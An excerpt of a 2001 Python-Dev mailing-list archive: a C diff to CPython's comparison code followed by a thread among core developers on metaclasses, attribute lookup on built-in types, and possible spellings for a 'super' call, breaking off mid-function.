+	DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n",
+		v->ob_type->tp_name,(long)v,
+		w->ob_type->tp_name,(long)w);
+	BINOP("__cmp__", "__rcmp__", PyNumber_Compare);
+	return _PyNumber_BinaryOperation(v,w,
+					 NB_SLOT(nb_cmp),
+					 "cmp()");
+}
+

[...]

+static PyObject *
+_PyNumber_BinaryOperation(PyObject *v,
+			  PyObject *w,
+			  const int op_slot,
+			  const char *operation)
+{
+	PyNumberMethods *mv, *mw;
+	register PyObject *x;
+	register binaryfunc *slot;
+	int c;
...
+	/* When using old coercion, make sure that the requested slot
+	   is available on old style numbers or use an emulation. */
+	if (op_slot > NB_SLOT(nb_hex)) {
+
+	    /* Emulation hooks: */
+	    if (op_slot == NB_SLOT(nb_cmp))
+		return _PyNumber_OldstyleCompare(v,w);
+
+	    goto badOperands;
+	}


[...]

 int
 PyObject_Compare(v, w)
 	PyObject *v, *w;
 {
 	PyTypeObject *tp;
@@ -291,27 +294,30 @@ PyObject_Compare(v, w)
 			Py_DECREF(res);
 			PyErr_SetString(PyExc_TypeError,
 					"comparison did not return an int");
 			return -1;
 		}
-		c = PyInt_AsLong(res);
+		c = PyInt_AS_LONG(res);
 		Py_DECREF(res);
 		return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 	}
 	if ((tp = v->ob_type) != w->ob_type) {
-		if (tp->tp_as_number != NULL &&
-				w->ob_type->tp_as_number != NULL) {
-			int err;
-			err = PyNumber_CoerceEx(&v, &w);
-			if (err < 0)
+		if (tp->tp_as_number != NULL ||
+		    w->ob_type->tp_as_number != NULL) {
+			PyObject *res;
+			int c;
+			res = PyNumber_Compare(v,w);
+			if (res == NULL)
 				return -1;
-			else if (err == 0) {
-				int cmp = (*v->ob_type->tp_compare)(v, w);
-				Py_DECREF(v);
-				Py_DECREF(w);
-				return cmp;
+			if (!PyInt_Check(res)) {
+			    PyErr_SetString(PyExc_TypeError,
+					"comparison did not return an int");
+			    return -1;
 			}
+			c = PyInt_AS_LONG(res);
+			Py_DECREF(res);
+			return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 		}
 		return strcmp(tp->tp_name, w->ob_type->tp_name);
 	}
 	if (tp->tp_compare == NULL)
 		return (v < w) ? -1 : 1;


-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Wed May  2 11:09:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 11:09:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <3AEFCEBD.2E5979C9@lemburg.com>

Guido van Rossum wrote:
> 
> While implementing more class-like behavior for built-in types in the
> experimental descr-branch in the 2.2 CVS tree, I've noticed problems
> caused by Python's collapsing of class attributes and instance
> attributes.
> 
> For example, suppose d is a dictionary.  My experimental changes make
> d.__class__ return DictType (from the types module).
> (DictType.__class__ is TypeType, by the way.)  I also added special
> methods.  For example, d.__repr__() now returns repr(d).  I am
> preparing for subclassing of built-in types, so I will eventually be
> able to derive a class MyDictType from DictType, as follows:
> 
> class MyDictType(DictType):
>   ...
> 
> Now comes the fun part.  Suppose MyDictType wants to define its own
> repr():
> 
> class MyDictType(DictType):
>   def __repr__(self):
>     return "MyDictType(%s)" % DictType.__repr__(self)
> 
> But, (surprise, surprise!), DictType itself also has a __repr__()
> method: it returns the string "<type 'dictionary'>".
> 
> So the above code would fail: DictType.__repr__() returns
> repr(DictType), and DictType.__repr__(self) raises an argument count
> error.  The correct __repr__ method for dictionary objects can be
> found as DictType.__dict__['__repr__'], but that looks hideous!
> 
> What to do?  Pragmatically, I can make DictType.__repr__ return
> DictType.__dict__['__repr__'], and all will be well in this example.
> But we have to tread carefully here: DictType.__class__ is TypeType,
> but DictType.__dict__['__class__'] is a descriptor for the __class__
> attribute on dictionary objects.
> 
> The best rule I can think of so far is that DictType.__dict__ gives
> the *true* set of attribute descriptors for dictionary objects, and is
> thus similar to Smalltalks's class.methodDict that Jim describes
> below.  DictType.foo is a shortcut that can resolve to either
> DictType.__dict__['foo'] or to an attribute (maybe a method) of
> DictType described in TypeType.__dict__['foo'], whichever is defined.
> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

I'm not sure I can follow you here: DictType.__repr__ is the
representation method of the dictionary and not inherited
from TypeType, so there should be no problem.

The problem with the misleading error message would only show
up in case DictType does not define a __repr__ method. Then the
inherited one from TypeType would come into play and cause
the problem you mention above.

Thinking in terms of meta-classes, I believe we should implement
this mechanism in the meta-class (TypeType in this case). Its
__getattr__() will have to decide whether or not to expose its
own methods and attributes or not. 

The only catch here is that currently instances and classes have 
control of whether and how to bind found functions as methods or not. 
We should  probably change that to pass complete control over to the 
meta-class object and remove the special control flows currently found
in instance_getattr2() and class_lookup().

In general, I think that meta-classes should not expose their
attributes to the class objects they create, since this causes
way to many problems.

Perhaps I'm oversimplifying things here, but I have a feeling that
we can go a long way by actually trying to see meta-classes as 
first class members in the interpreter design and moving all the 
binding and lookup mechanisms over to this object type. The special 
casing should then take place in the meta-class rather than its 
creations.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 12:57:42 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 12:57:42 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>  <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>

> > The most common use for these seems to be for calling
> > inherited methods, so perhaps something like
> > 
> >    inherited MyBaseClass.foo(arg, ...)
> > 
> > which would be equivalent to
> > 
> >    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> > 
> > where getmethod() is a new builtin like getattr()
> > except that it looks in the __classdict__, and 'self'
> > is really whatever the first argument of the containing
> > method was.
> 
> The second most common use is to reference class variables
> (e.g. imagine a class that keeps counters of how many instances have
> been created and deleted in C.initcount and C.delcount).  But these
> should not have to change, since they really are class attributes.
> 
> > Now that we have __future__, would such a change be contemplatable?
> > Or is it too radical to even think about?
> 
> If we can find a way to spell "super.method", we should be ready for
> the future.  I can't think of something right off the bat
> unfortunately.

Could we make

  super(self, MyBaseClass).foo(arg, ...)

behave similar to

  MyBaseClass.foo(self, arg, ...)

Wrapping this stuff in a function would probably also
enable to use the same pattern in existing python versions.

Thomas


From thomas.heller at ion-tof.com  Wed May  2 13:12:21 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 13:12:21 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>

> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
> how metaclasses work in Smalltalk.  He should know, since he invented
> them! :-)  I include it below, with his permission.

I found this very interesting reading.

[From Jim Althoff]
> In the list below, indentation indicates class hieararchy (superclass --
> subclass)
The indentation, unfortunately, seems to be destroyed.

> 
> plain-class
> ----------------
> <none>
> o Class
>    o  Object                                                   isInstanceOf
> o ObjectMetaClass                     isInstanceOf  MetaClass
>         o Class                                                isInstanceOf
> o ClassMetaClass                    isInstanceOf  MetaClass
>             o MetaClass                                  isInstanceOf
> o MetaClassMetaClass      isInstanceOf  MetaClass
>         . . .
>         o Rectangle                                        isInstanceOf
> o RectangleMetaClass          isInstanceOf  MetaClass
>             o SpecializedRectangle            isInstanceOf
> o SpecializedRectangleMetaClass  isInstanceOf  MetaClass

A question for Jim (this is more Smalltalk than Python related):
How does the Behaviour class fit into this picture?

Thhomas


From guido at digicool.com  Wed May  2 14:15:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 07:15:57 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200."
             <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com>  
            <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> 
Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>

> > If we can find a way to spell "super.method", we should be ready for
> > the future.  I can't think of something right off the bat
> > unfortunately.
> 
> Could we make
> 
>   super(self, MyBaseClass).foo(arg, ...)
> 
> behave similar to
> 
>   MyBaseClass.foo(self, arg, ...)
> 
> Wrapping this stuff in a function would probably also
> enable to use the same pattern in existing python versions.

Yes, I can see how to write super() using current tools (or 1.5.2
even).  The problem is that this makes super calls even more wordy
than they already are!  I can't think of anything that wouldn't
require compiler support though.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gward at python.net  Wed May  2 14:57:41 2001
From: gward at python.net (Greg Ward)
Date: Wed, 2 May 2001 08:57:41 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>
Message-ID: <20010502085741.B515@gerg.ca>

On 02 May 2001, Guido van Rossum said:
> Yes, I can see how to write super() using current tools (or 1.5.2
> even).  The problem is that this makes super calls even more wordy
> than they already are!  I can't think of anything that wouldn't
> require compiler support though.

I was just doing some gedanken with various ways to spell "super", and I
think my favourite is the same as Java's (as I remember it):

class MyClass (BaseClass):
    def foo (self, arg1, arg2):
         super.foo(arg1, arg2)


Since I don't know much about Python's guts, I can't say how
implementable this is, but I like the spelling.  The semantics would be
something like this (with adjustments to the reality of Python's guts):

  * 'super' is a magic object that only makes sense inside a 'def'
    inside a 'class' (at least for now; perhaps it could be generalized
    to work at class scope as well as method scope, but let's keep
    it simple)

  * super's notional __getattr__() does something like this:
    - peek at the calling stack frame and fetch the calling function
      (MyClass.foo) and the first argument to that function (self)
    - [is this possible?] ensure that calling_function is a bound
      method, and that it's bound to the self object we just plucked
      from the stack; raise a "misuse of super object" exception if not
    - walk the superclass tree starting at self.__class__.__bases__
      (ie. skip self's class), looking for an object with the name
      passed to this __getattr__() call -- 'foo'
    - when found, return it
    - if not found, raise AttributeError

The ability to peek at the calling stack frame is essential to this
scheme, in order to fetch the "current object" (self) without needing to
have it explicitly passed.  Is this as bothersome from C as it is from
Python?

        Greg
-- 
Greg Ward - nerd                                        gward at python.net
http://starship.python.net/~gward/
In space, no one can hear you fart.


From mal at lemburg.com  Wed May  2 15:07:27 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 15:07:27 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <3AF0068F.32388C87@lemburg.com>

Greg Ward wrote:
> 
> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> ...

This doesn't work in Python since Python has multiple inheritence,
e.g. super in 

class A(B,C):
	def foo(self):
		super.foo()

is ambiguous.

I'd rather suggest adding a function for finding the basemethod
of a method. This is probably the most common task in this context.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 15:12:40 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 15:12:40 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook>

[Greg Ward]

> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)
> 
>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not
>     - walk the superclass tree starting at self.__class__.__bases__
Caareful!
The search in the above context must start at MyClass.__bases__
which may not be the same as self.__class__.__bases__.

Thomas


From guido at digicool.com  Wed May  2 16:29:03 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:29:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400."
             <20010502085741.B515@gerg.ca> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>  
            <20010502085741.B515@gerg.ca> 
Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>

[Greg Ward, welcome back!]
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)

I'm sure that's everybody's favorite way to spell it!  It's mine too. :-)

> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)

Yes, that's about the only way it can be made to work.  The compiler
will have to (1) detect that 'super' is a free variable, and (2) make
it a local and initialize it with the proper magic.  Or, to relieve
the burden from the symbol table, we could make super a keyword, at
the cost of breaking existing code.

I don't think super is needed outside methods.

>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not

I don't think you can make that test, but making it a 'magic local'
as I suggested above would avoid the problem.

>     - walk the superclass tree starting at self.__class__.__bases__
>       (ie. skip self's class), looking for an object with the name
>       passed to this __getattr__() call -- 'foo'
>     - when found, return it
>     - if not found, raise AttributeError

Yup, that's the easy part. :-)

> The ability to peek at the calling stack frame is essential to this
> scheme, in order to fetch the "current object" (self) without needing to
> have it explicitly passed.  Is this as bothersome from C as it is from
> Python?

No, in C it's easy.  The problem is that there is no information in
the frame that tells you where the currently executing function was
defined -- all you have is the code object, which is
context-independent.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 16:30:20 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:30:20 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200."
             <3AF0068F.32388C87@lemburg.com> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
            <3AF0068F.32388C87@lemburg.com> 
Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com>

> This doesn't work in Python since Python has multiple inheritence,
> e.g. super in 
> 
> class A(B,C):
> 	def foo(self):
> 		super.foo()
> 
> is ambiguous.

I'm not sure what you mean.  The search is totally well-defined: first
search B for a foo method, then search C.

> I'd rather suggest adding a function for finding the basemethod
> of a method. This is probably the most common task in this context.

I've never heard of the concept of basemethod, but if I may venture a
guess, it would be the same definition as I give above.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy at digicool.com  Wed May  2 15:38:42 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 2 May 2001 09:38:42 -0400 (EDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>
	<200105020248.VAA30315@cj20424-a.reston1.va.home.com>
	<038601c0d2f6$b6159770$e000a8c0@thomasnotebook>
	<200105021215.HAA31939@cj20424-a.reston1.va.home.com>
	<20010502085741.B515@gerg.ca>
	<200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <15088.3554.953359.757584@slothrop.digicool.com>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

  >> Since I don't know much about Python's guts, I can't say how
  >> implementable this is, but I like the spelling.  The semantics
  >> would be something like this (with adjustments to the reality of
  >> Python's guts):
  >>
  >> * 'super' is a magic object that only makes sense inside a 'def'
  >> inside a 'class' (at least for now; perhaps it could be
  >> generalized to work at class scope as well as method scope, but
  >> let's keep it simple)

  GvR> Yes, that's about the only way it can be made to work.  The
  GvR> compiler will have to (1) detect that 'super' is a free
  GvR> variable, and (2) make it a local and initialize it with the
  GvR> proper magic.  Or, to relieve the burden from the symbol table,
  GvR> we could make super a keyword, at the cost of breaking existing
  GvR> code.

  GvR> I don't think super is needed outside methods.

It seems helpful to clarify here, since this came up in conversation
at PythonLabs just the other day with the yield statement.

If we try to avoid keywords, we have to take the "well, I don't see
anyone assigning to this name" route.  If the compiler does not detect
any assignment to a nearly reserved word, like super, it would give
the use of that word special meaning.

There are a bunch of little problems.  A module could (not necessarily
should) be designed to have a global name poked into its namespace;
this would break, because the name would already have transmogrified
from a regular variable into a special one.  The use of exec or import
star would make it impossible for the word to take on its special
meaning.

So keywords really are a lot clearer, but they have the potential to
be incompatible.

Jeremy


From fredrik at pythonware.com  Wed May  2 16:00:55 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 2 May 2001 16:00:55 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff>

guido wrote:

> > class MyClass (BaseClass):
> >     def foo (self, arg1, arg2):
> >          super.foo(arg1, arg2)
>
> I'm sure that's everybody's favorite way to spell it!

not mine.  my brain contains far too much Python 1.5.2 code
for it to accept that some variables are dynamically scoped,
while others are lexically scoped.

why not spell it out:

    self.__super__.foo(arg1, arg2)

or

    self.super.foo(arg1, arg2)

or

    super(self).foo(arg1, arg2)

> Or, to relieve the burden from the symbol table, we could make super
> a keyword, at the cost of breaking existing code.

hey, how about introducing $ as a keyword prefix for newly introduced
keywords?

    $super.foo(arg1, arg2)

(this can of course be mapped to either of my previous suggestions;
"$foo" either means "self.foo" or "foo(self)"...)

and to save a little typing, only use it for keywords that start with
an "s" (should leave us plenty of expansion room):

    $uper.foo(arg1, arg2)

otoh, if "super" is common enough to motivate introducing magic objects
into python, maybe "$" should mean "super."?

    $foo(arg1, arg2)

and while we're at it, let's introduce "@" for "self.".

gotta run -- time for my monthly reboot /F


From guido at digicool.com  Wed May  2 17:03:37 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:03:37 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200."
             <3AEFCEBD.2E5979C9@lemburg.com>
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
            <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com>

[me]
> > The best rule I can think of so far is that DictType.__dict__ gives
> > the *true* set of attribute descriptors for dictionary objects, and is
> > thus similar to Smalltalks's class.methodDict that Jim describes
> > below.  DictType.foo is a shortcut that can resolve to either
> > DictType.__dict__['foo'] or to an attribute (maybe a method) of
> > DictType described in TypeType.__dict__['foo'], whichever is defined.
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.

[MAL]
> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that both a dictionary object (call it d) and its type
(DictType) have a __repr__ method: repr(d) returns "d", and
repr(DictType) returns "<type 'dictionary'>".

Given the analogy with classes, where str(x) invokes x.__str__() and
x.__str__() can also be called directly, it is not unreasonable to
expect that this works in general, so that repr(d) can be spelled as

    d.__repr__()

and repr(DictType) as

    DictType.__repr__()

And, given another analogy with classes, where x.foo() is equivalent
to x.__class__.foo(x), the two forms above should also be equivalent
to

    d.__class__.__repr__(d)

and

    DictType.__class__.__repr__(DictType)

But since d.__class__ is DictType, we now have two conflicting ways to
derive a meaning for DictType.__repr__: the first one going

    repr(DictType) => DictType.__repr__()

and the second one going

    repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d)

The rule quoted above chooses the second meaning, from the very
pragmatic point that once I allow subclassing from DictType, such a
subclass might very well want to override __repr__ to wrap the base
class __repr__, and the conventional way to reference that (barring
the implementation of 'super') is DictType.__repr__.  Direct
invocation of an object's own __repr__ method as x.__repr__() is much
les common.  The implementation of repr(x) can do the right thing,
which is to look for x.__class__.__dict__['__repr__'].

> The problem with the misleading error message would only show
> up in case DictType does not define a __repr__ method. Then the
> inherited one from TypeType would come into play and cause
> the problem you mention above.

No, the issue is not inheritance: I haven't implemented inheritance
yet.  DictType is an instance of TypeType but doesn't inherit from it.

> Thinking in terms of meta-classes, I believe we should implement
> this mechanism in the meta-class (TypeType in this case). Its
> __getattr__() will have to decide whether or not to expose its
> own methods and attributes or not.

That's exactly how I solved it: type_getattro() implements the rule
quoted at the top.

> The only catch here is that currently instances and classes have
> control of whether and how to bind found functions as methods or not.
> We should  probably change that to pass complete control over to the
> meta-class object and remove the special control flows currently found
> in instance_getattr2() and class_lookup().

Um, yeah, that's where I think this will end up causing more trouble.

Right now, if x is an instance, some attributes like x.__class__ and
x.__dict__ special-cased in instance_getattr().  The mechanism I
propose removes the need for (most of) such special cases, and instead
allows the class to provide "descriptors" for instance attributes.
So, for example, if instances of a class C have an attribute named
foo, C.__dict__['foo'] contains the descriptor for that attribute, and
that is how the implementation decides how to interpret x.foo
(assuming x is an instance of C).  We may be able to access this same
descriptor as C.foo, but that's really only important for backwards
compatibility with the way classes work today.

> In general, I think that meta-classes should not expose their
> attributes to the class objects they create, since this causes
> way to many problems.

I agree.

> Perhaps I'm oversimplifying things here, but I have a feeling that
> we can go a long way by actually trying to see meta-classes as
> first class members in the interpreter design and moving all the
> binding and lookup mechanisms over to this object type. The special
> casing should then take place in the meta-class rather than its
> creations.

Yes, that's where I'm heading!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:02:41 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:02:41 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
	            <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF01381.592AE31B@lemburg.com>

Guido van Rossum wrote:
> 
> > This doesn't work in Python since Python has multiple inheritence,
> > e.g. super in
> >
> > class A(B,C):
> >       def foo(self):
> >               super.foo()
> >
> > is ambiguous.
> 
> I'm not sure what you mean.  The search is totally well-defined: first
> search B for a foo method, then search C.

I thought you were talking about an abstract super class which is
how Java uses this term. 

Rereading some of the posts, I think you are indeed referring to
the method which foo overrides -- this is what I call basemethod
(since it is implemented in one of the base classes).
 
> > I'd rather suggest adding a function for finding the basemethod
> > of a method. This is probably the most common task in this context.
> 
> I've never heard of the concept of basemethod, but if I may venture a
> guess, it would be the same definition as I give above.

The basemethod can be defined as the first method of the same name
found in the inheritence tree using the standard Python lookup 
strategy (left-right, depth first) when continuing the lookup search
at the node in the inheritence tree which defines the method querying
the basemethod.

In other words: you let Python continue the search for the method
as if it hadn't found the occurrance calling the bsaemethod()
API. Hmm, still not clear enough... better let Tim jump in here
(we've had a discussion about basemethod() some months or years
ago). Tim ?

Note that there are many ways of defining what a basemethod
is, due to the ambiguities that are caused by multiple inheritence
(e.g. the same base class may appear in different branches of the
inheritence tree).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 17:05:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:05:30 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200."
             <000d01c0d310$4ee127d0$0900a8c0@spiff> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>  
            <000d01c0d310$4ee127d0$0900a8c0@spiff> 
Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com>

> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)
> 
> > Or, to relieve the burden from the symbol table, we could make super
> > a keyword, at the cost of breaking existing code.
> 
> hey, how about introducing $ as a keyword prefix for newly introduced
> keywords?
> 
>     $super.foo(arg1, arg2)
> 
> (this can of course be mapped to either of my previous suggestions;
> "$foo" either means "self.foo" or "foo(self)"...)
> 
> and to save a little typing, only use it for keywords that start with
> an "s" (should leave us plenty of expansion room):
> 
>     $uper.foo(arg1, arg2)
> 
> otoh, if "super" is common enough to motivate introducing magic objects
> into python, maybe "$" should mean "super."?
> 
>     $foo(arg1, arg2)
> 
> and while we're at it, let's introduce "@" for "self.".
> 
> gotta run -- time for my monthly reboot /F

LOL!  But you forgot the spelling of

    self.__super.foo(arg1, arg2)

which would pass in the class name that's the other necessary input to
a proper implementation of super. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:04:29 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:04:29 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
	            <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF013ED.8A190FE2@lemburg.com>

Here's an implementation of what I currently use to track down
the basemethod (taken from mx.Tools):

import types
_basemethod_cache = {}

def basemethod(object,method=None,

               cache=_basemethod_cache,InstanceType=types.InstanceType,
               ClassType=types.ClassType,None=None):

